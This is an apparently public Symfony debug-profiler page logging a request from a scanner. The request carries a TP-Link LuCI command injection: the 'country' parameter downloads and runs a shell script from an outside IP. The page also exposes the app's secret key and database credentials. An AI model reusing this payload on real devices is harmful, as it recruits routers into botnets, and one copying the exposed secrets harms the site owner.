GET https://heyjan.de/cgi-bin/luci/;stok=/locale?country=%24%28id%3E%60cd%20%2Ftmp%3B%20rm%20-rf%20sh%3B%20wget%20http%3A%2F%2F176.65.148.234%2Fsh%3B%20chmod%20777%…

Response
200 OK
Browse referrer URL
IP
45.95.147.209
Profiled on
Token
c58e8d

SpaController :: index

Request

GET Parameters

Key Value
country 
"$(id>`cd /tmp; rm -rf sh; wget http://176.65.148.234/sh; chmod 777 sh; ./sh tplink; rm -rf sh`)"
form 
"country"
operation 
"write"

POST Parameters

No POST parameters

Uploaded Files

No files were uploaded

Request Attributes

Key Value
_access_control_attributes 
null
_controller 
"App\Controller\SpaController::index"
_firewall_context 
"security.firewall.map.context.main"
_route 
"app_spa"
_route_params 
[
  "route" => "cgi-bin/luci/;stok=/locale"
]
_security_authenticators 
[]
_security_skipped_authenticators 
[]
_stopwatch_token 
"541456"
route 
"cgi-bin/luci/;stok=/locale"

Request Headers

Header Value
host 
"heyjan.de"
referer 
"http://159.69.20.145:80/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+sh%3B+wget+http%3A%2F%2F176.65.148.234%2Fsh%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh%60)"
user-agent 
"Go-http-client/1.1"
x-php-ob-level 
"0"

Request Content

Request content not available (it was retrieved as a resource).

Response

Response Headers

Header Value
cache-control 
"no-cache, private"
content-type 
"text/html; charset=UTF-8"
date 
"Sat, 03 May 2025 01:24:42 GMT"
x-debug-token 
"c58e8d"

Cookies

Request Cookies

No request cookies

Response Cookies

No response cookies

Session

Session Metadata

No session metadata

Session Attributes

No session attributes

Session Usage

0 Usages
Stateless check enabled

Session not used.

Flashes

Flashes

No flash messages were created.

Server Parameters

Server Parameters

Defined in .env

Key Value
APP_ENV 
"dev"
APP_SECRET 
"e7ba895cc4e94ed881faf742e4074c9c"
DATABASE_URL 
"postgresql://app:!ChangeMe!@127.0.0.1:5432/app?serverVersion=16&charset=utf8"
MAILER_DSN 
"null://null"
MESSENGER_TRANSPORT_DSN 
"doctrine://default?auto_setup=0"

Defined as regular env variables

Key Value
APP_DEBUG 
"1"
CONTENT_LENGTH 
""
CONTENT_TYPE 
""
DOCUMENT_ROOT 
"/var/www/html/public"
DOCUMENT_URI 
"/index.php"
FCGI_ROLE 
"RESPONDER"
GATEWAY_INTERFACE 
"CGI/1.1"
GPG_KEYS 
"1198C0117593497A5EC5C199286AF1F9897469DC C28D937575603EB4ABB725861C0779DC5C0A9DE4 AFD8691FDAEDF03BDF6E460563F15A9B715376CA"
HOME 
"/var/www"
HOSTNAME 
"7573831e6d3c"
HTTPS 
"on"
HTTP_HOST 
"heyjan.de"
HTTP_REFERER 
"http://159.69.20.145:80/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+sh%3B+wget+http%3A%2F%2F176.65.148.234%2Fsh%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh%60)"
HTTP_USER_AGENT 
"Go-http-client/1.1"
PATH 
"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
PHPIZE_DEPS 
"autoconf \t\tdpkg-dev \t\tfile \t\tg++ \t\tgcc \t\tlibc-dev \t\tmake \t\tpkg-config \t\tre2c"
PHP_ASC_URL 
"https://www.php.net/distributions/php-8.3.19.tar.xz.asc"
PHP_CFLAGS 
"-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64"
PHP_CPPFLAGS 
"-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64"
PHP_INI_DIR 
"/usr/local/etc/php"
PHP_LDFLAGS 
"-Wl,-O1 -pie"
PHP_SELF 
"/index.php"
PHP_SHA256 
"976e4077dd25bec96b5dfe8938052d243bbd838f95368a204896eff12756545f"
PHP_URL 
"https://www.php.net/distributions/php-8.3.19.tar.xz"
PHP_VERSION 
"8.3.19"
PWD 
"/var/www/html"
QUERY_STRING 
"form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+sh%3B+wget+http%3A%2F%2F176.65.148.234%2Fsh%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh%60)"
REDIRECT_STATUS 
"200"
REMOTE_ADDR 
"45.95.147.209"
REMOTE_PORT 
"45380"
REQUEST_METHOD 
"GET"
REQUEST_SCHEME 
"https"
REQUEST_TIME 
1746235482
REQUEST_TIME_FLOAT 
1746235482.7463
REQUEST_URI 
"/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+sh%3B+wget+http%3A%2F%2F176.65.148.234%2Fsh%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh%60)"
SCRIPT_FILENAME 
"/var/www/html/public/index.php"
SCRIPT_NAME 
"/index.php"
SERVER_ADDR 
"172.18.0.4"
SERVER_NAME 
"heyjan.de"
SERVER_PORT 
"443"
SERVER_PROTOCOL 
"HTTP/1.1"
SERVER_SOFTWARE 
"nginx/1.26.3"
SYMFONY_DOTENV_PATH 
"/var/www/html/.env"
SYMFONY_DOTENV_VARS 
"APP_ENV,APP_SECRET,DATABASE_URL,MESSENGER_TRANSPORT_DSN,MAILER_DSN"
USER 
"www-data"
argc 
0
argv 
[]